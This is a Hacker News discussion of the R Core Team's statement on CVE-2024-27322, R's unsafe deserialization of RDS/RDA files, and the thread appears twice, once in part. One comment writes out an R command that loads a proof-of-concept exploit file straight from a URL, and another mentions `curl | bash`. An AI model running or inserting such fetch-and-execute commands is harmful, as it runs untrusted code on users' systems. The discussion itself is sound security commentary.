Statement on CVE-2024-27322 (opens in new tab)

(blog.r-project.org)

34 pointssamch932y ago49 comments

49 comments

26 comments · 7 top-level

rfoo2y ago· 8 in thread

tl;dr R has its own pickle.load and someone decided to milk a CVE [1] out of this fact.

[1] and a blog post for bragging, thankfully they didn't do a name and a logo.

cmeacham982y ago

This is uncharitable.

From what I can tell, these RDS files are a common way of sharing data among R users. I would be relatively surprised if reading someone else's dataset was able to execute arbitrary code.

I think this is more like if reading a CSV via numpy could execute code.

steve_s2y ago

RDS files are a common way of sharing serialized R objects. Promises are valid R objects and supported by this serialization format. They always have been and I believe it is an intentional feature. The problem is that some people may think of RDS files as more convenient CSV files, but they are not.

greentxt2y ago

CSV is CSV. A serialized object is a serialized object. The main concern they cite, are supply chain attacks. So it’s like saying loading a package can… load a package. Supply chain attacks will always be a thing. I’m grateful for the work of the researchers in question but don’t feel this is much of a blemish when it comes to R itself being insecure.

3 more replies

rfoo2y ago

.pkl files were, are, and will still be a a common way of sharing data among Python users. Despite it is known to be unsafe since forever and nobody claimed a CVE for this fact.

A few years back I have heard from a lot of people working in ML communities that they are surprised that `numpy.load` is able to execute arbitrary code.

6 more replies

fanf22y ago

I think a good response from the R authors should:

• Make clear the bug is due to unsafe deserialization (not serialization as their statement says). This is important because unsafe deserialization is a major source of remote code execution vulnerabilities.

• Update the documentation to make it clear that R’s serialization and deserialization functions are not safe to use for sharing data across the network. Serialized objects should be treated as code, not data.

phoe-krk2y ago

Blog post in question: https://hiddenlayer.com/research/r-bitrary-code-execution/

ziddoap2y ago

>and a blog post for bragging, thankfully they didn't do a name and a logo.

I am still amazed on how many people on HN seem to get worked up over vulnerability names. God forbid someone also slaps a piece of clip art or whatever on the blog post. Worse yet, if they buy a $5 domain... the horror!

Maybe it's just me, but I'd much rather remember "Heartbleed" over "CVE-2014-0160".

rfoo2y ago

It's fine when your bugs are (unanimously) cool, be it Heartbleed, Meltdown, Spectre or Load Value Injection (this one gets a hilarious video even).

For less cool bugs a logo and a name seems rather... strange, because it happens all the time and it's not clear why it's special. Imagine a coworker fixed a random JIRA ticket which may be "switching to night mode does not work on a certain page" and then named it "Nightfall" and a logo and a landing page and a lot of bragging in the next periodic meeting.

1 more reply

nomilk2y ago· 6 in thread

> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.

Isn't this demonstrably false? I.e. run this [1]

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).

When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.

I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.

FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.

[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...

saghm2y ago

It's hard not to read the quote you give as basically admitting that they _can't_ entertain the idea that there are "wider security implications" because that would be tacitly admitting that the language itself is built on shaky foundations. Something being a "core feature" _increases_ the scope of any security implications, but it also makes it a lot harder to fix without having to change fundamental parts of the language, and it sounds like that would be a non-starter for them.

vitiral2y ago

Edit: apparently "load" is used to deserialize some data. Ya, this is bad, nevermind. I guess treat data stored in this format as code (effectively: don't use this format) unless it can be guaranteed safe.

I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?

You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.

If you want security don't download files from the internet and execute them.

nomilk2y ago

> aren't you downloading a file from the Internet and executing it?

Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.

If a malicious user tries to smuggle something into a csv or json file that isn’t possible. But when reading in an RDS it’s trivial.

I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I defnn in it ly don’t feel comfortable trusting theirs.

Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)

1 more reply

jojobas2y ago

Is it really execution be design? The docs don't suggest that:

>Description

>Reload datasets written with the function save.

sim7c002y ago

> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language. Isn't this demonstrably false? I.e. run this [1]

>> This does not prove the concept of promises and/or serialization are inherently unsafe core features. It simply shows there's some implementation issues to address. You go further to talk about these implementation issues which is helpful and good, but it does nothing to prove unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.

How many languages have gotten and fixed such bugs. Are those languages unsafe/unsane or were their implementations simply buggy?

Though in practice the difference isn't there, as we use language implementations, not their ideal conceptual forms, but I do think its unfair to make such claims, and say that some exploit of a langauge implementation causes the concepts within the language to be inherently exploitable.

- might be missing something, but it seems there's 2 different streams being crossed? (you do make good points about implementation imho, nothing wrong there ofc! :))

mfer2y ago

Part of this comes to trust and who/where trust decisions happen.

If I read the projects statement right, they think you should only load what you already trust.

The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.

Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.

dartos2y ago· 4 in thread

Have there been more CVEs lately, or did the whole Jia Tian thing make them rank higher on HN?

dfox2y ago

There have been more CVEs for the last 5 or so years. The reason is that "number of CVEs" is used in InfoSec community as kind of performance metric, so the "researchers" are incentivized to report total non-sense as security vulnerabilities. Second reason is that the whole "InfoSec" thing is viewed as an career choice where there is shitload of money to be made, which caused many people with questionable skills and ethics to become "security researchers".

ethbr12y ago

On the other hand, scanners do flag CVEs (and therefore regulatory patch requirements are triggered by them).

So at the end of the day, it does apply patch pressure to regulated companies.

1 more reply

simcop23872y ago

I'd imagine a bit of both. More people looking for issues because of it, and then also because of something so high profile people are more likely to pay attention and upvote because they've seen more recently.

jpalomaki2y ago

For example 2023q1 vs 2024q1: 7,015 vs 8,697 [1].

https://www.cve.org/About/Metrics

armchairhacker2y ago· 1 in thread

I don’t know. R promises are extremely powerful. Not only can they run arbitrary code (e.g. shell commands), but they have arbitrary access over the caller environment (e.g. you can pass a lazy argument to a function that can list all variable names/values of variables in the function’s body and mutate some of them).

I also don’t know if deserializing is 100% secure even now, because it only detects whether the root value is lazy, and I’m not sure if certain value’s children can be lazy as well.

I think the larger issue is that most languages are insecure unless you go out of your way to be careful. Many package managers (including cargo) let dependencies run arbitrary build scripts. AFAIK reading a Python picklefile can invoke arbitrary code, which is arguably worse than deserializing an RDS file because in R you at least have to read the malicious deserialized value. The problem of reading untrusted data isn’t new, see log4j and SQL injections.

All input should be either a) trusted or b) handled carefully. Then it doesn’t matter the language. The problem is that’s not easy. Like in R, if `readRDS` really can still return promises, then “handling it carefully” means inspecting every nested value without reading it (this is possible in R with reflection); or more likely (as with Python’s pickling), read the data in a more constrained format.

ethbr12y ago

People whose day job is security probably have terms for this, but it seems important to distinguish theoretically-vulnerable and practically-vulnerable.

In the sense that for sufficiently complex ecosystems (read: all widely used programming ecosystems) each component may itself be theoretically secure... and yet the ways they are commonly used in practice are insecure.

>> Users should ensure that they only use R code and data from trusted sources and that the privileges of the account running R are appropriately limited.

IMHO, this is a cop-out. Abrogating responsibility for common use patterns in your ecosystems isn't how you make everyone more secure.

Better: 'What are our users actually doing?' -> 'Why are they doing that?' (usually: inconvenient UX around secure alternatives) -> 'How can we make it easier to use secure alternatives?'

sim7c002y ago

A bit of a strange statement. It's OK guys, for your language to have security related bugs. Fixing the bug, shows it was in the core language and now, having fixed the bug, the language is more secure.

It does touch an interesting point, 'safeness' of a language itself. I think a lot of languages have bugs in their core libraries and implementaties, and you _could_ go as far as to say that language is then insecure.

But this is not really true. The language itself, is not its implementation. The design choices and concepts provided by R, i think, are not inherently insecure. Though, as this bug shows, implementation of those concepts, can be done, inadvertendly/unwittingly, in an insecure way.

I would like to encourage people to stop speaking about languages as safe/unsafe. This seems to popular today. The languages themselves are complicated to implement as hell, and there comes bugs with complex implementations.

Raise the bug, perhaps if severe, raise awareness of it. But don't shit on decades of diligent people's work because you found a bug and want your company or group to get some good marketing out of it. this is inherently unethical. These people are great programmers, likely much more advanced in their knowlege of languages and language implementation than some hacker who runs into a security hole. That should be respected and commended, and hackers can help these guys to improve their already awesome creations.

Thanks to the implementers, thanks to the hackers, and lets all be friendly and peaceful, and not try to exploit someones honest bug into some marketing opportunity by taking a shit right on their work.

greentxt2y ago

It’s going to be impossible to get the majority of r users to update r to remove this vulnerability. Not the fault of r but because so many unsophisticated users have r installed from 4 years ago, this exploit (which is not much of an exploit really) will stick around forever.

taspeotis2y ago

> This is a brief statement on behalf or the R Core Team on the serialization bug recently reported by the cybersecurity form HiddenLayer.

Cybersecurity firm, surely? Of all the things not to proofread … a press release.

j / k navigate · click thread line to collapse

49 comments

26 comments · 7 top-level

rfoo2y ago· 8 in thread

tl;dr R has its own pickle.load and someone decided to milk a CVE [1] out of this fact.

[1] and a blog post for bragging, thankfully they didn't do a name and a logo.

cmeacham982y ago

This is uncharitable.

From what I can tell, these RDS files are a common way of sharing data among R users. I would be relatively surprised if reading someone else's dataset was able to execute arbitrary code.

I think this is more like if reading a CSV via numpy could execute code.

steve_s2y ago

greentxt2y ago

3 more replies

rfoo2y ago

.pkl files were, are, and will still be a a common way of sharing data among Python users. Despite it is known to be unsafe since forever and nobody claimed a CVE for this fact.

A few years back I have heard from a lot of people working in ML communities that they are surprised that `numpy.load` is able to execute arbitrary code.

6 more replies

fanf22y ago

I think a good response from the R authors should:

phoe-krk2y ago

Blog post in question: https://hiddenlayer.com/research/r-bitrary-code-execution/

ziddoap2y ago

>and a blog post for bragging, thankfully they didn't do a name and a logo.

Maybe it's just me, but I'd much rather remember "Heartbleed" over "CVE-2014-0160".

rfoo2y ago

It's fine when your bugs are (unanimously) cool, be it Heartbleed, Meltdown, Spectre or Load Value Injection (this one gets a hilarious video even).

1 more reply

nomilk2y ago· 6 in thread

> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.

Isn't this demonstrably false? I.e. run this [1]

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).

When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.

[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...

saghm2y ago

vitiral2y ago

I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?

You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.

If you want security don't download files from the internet and execute them.

nomilk2y ago

> aren't you downloading a file from the Internet and executing it?

Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.

If a malicious user tries to smuggle something into a csv or json file that isn’t possible. But when reading in an RDS it’s trivial.

I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I defnn in it ly don’t feel comfortable trusting theirs.

1 more reply

jojobas2y ago

Is it really execution be design? The docs don't suggest that:

>Description

>Reload datasets written with the function save.

sim7c002y ago

How many languages have gotten and fixed such bugs. Are those languages unsafe/unsane or were their implementations simply buggy?

- might be missing something, but it seems there's 2 different streams being crossed? (you do make good points about implementation imho, nothing wrong there ofc! :))

mfer2y ago

Part of this comes to trust and who/where trust decisions happen.

If I read the projects statement right, they think you should only load what you already trust.

The problem is that many people load things they just found on the Internet. Like `curl | bash` to random things people find.

Note, if it's not obvious, `curl | bash` to scripts on the Internet is just as insecure as the current R implementation.

dartos2y ago· 4 in thread

Have there been more CVEs lately, or did the whole Jia Tian thing make them rank higher on HN?

dfox2y ago

ethbr12y ago

On the other hand, scanners do flag CVEs (and therefore regulatory patch requirements are triggered by them).

So at the end of the day, it does apply patch pressure to regulated companies.

1 more reply

simcop23872y ago

jpalomaki2y ago

For example 2023q1 vs 2024q1: 7,015 vs 8,697 [1].

https://www.cve.org/About/Metrics

armchairhacker2y ago· 1 in thread

I also don’t know if deserializing is 100% secure even now, because it only detects whether the root value is lazy, and I’m not sure if certain value’s children can be lazy as well.

ethbr12y ago

People whose day job is security probably have terms for this, but it seems important to distinguish theoretically-vulnerable and practically-vulnerable.

>> Users should ensure that they only use R code and data from trusted sources and that the privileges of the account running R are appropriately limited.

IMHO, this is a cop-out. Abrogating responsibility for common use patterns in your ecosystems isn't how you make everyone more secure.

Better: 'What are our users actually doing?' -> 'Why are they doing that?' (usually: inconvenient UX around secure alternatives) -> 'How can we make it easier to use secure alternatives?'

sim7c002y ago

greentxt2y ago

taspeotis2y ago

> This is a brief statement on behalf or the R Core Team on the serialization bug recently reported by the cybersecurity form HiddenLayer.

Cybersecurity firm, surely? Of all the things not to proofread … a press release.

j / k navigate · click thread line to collapse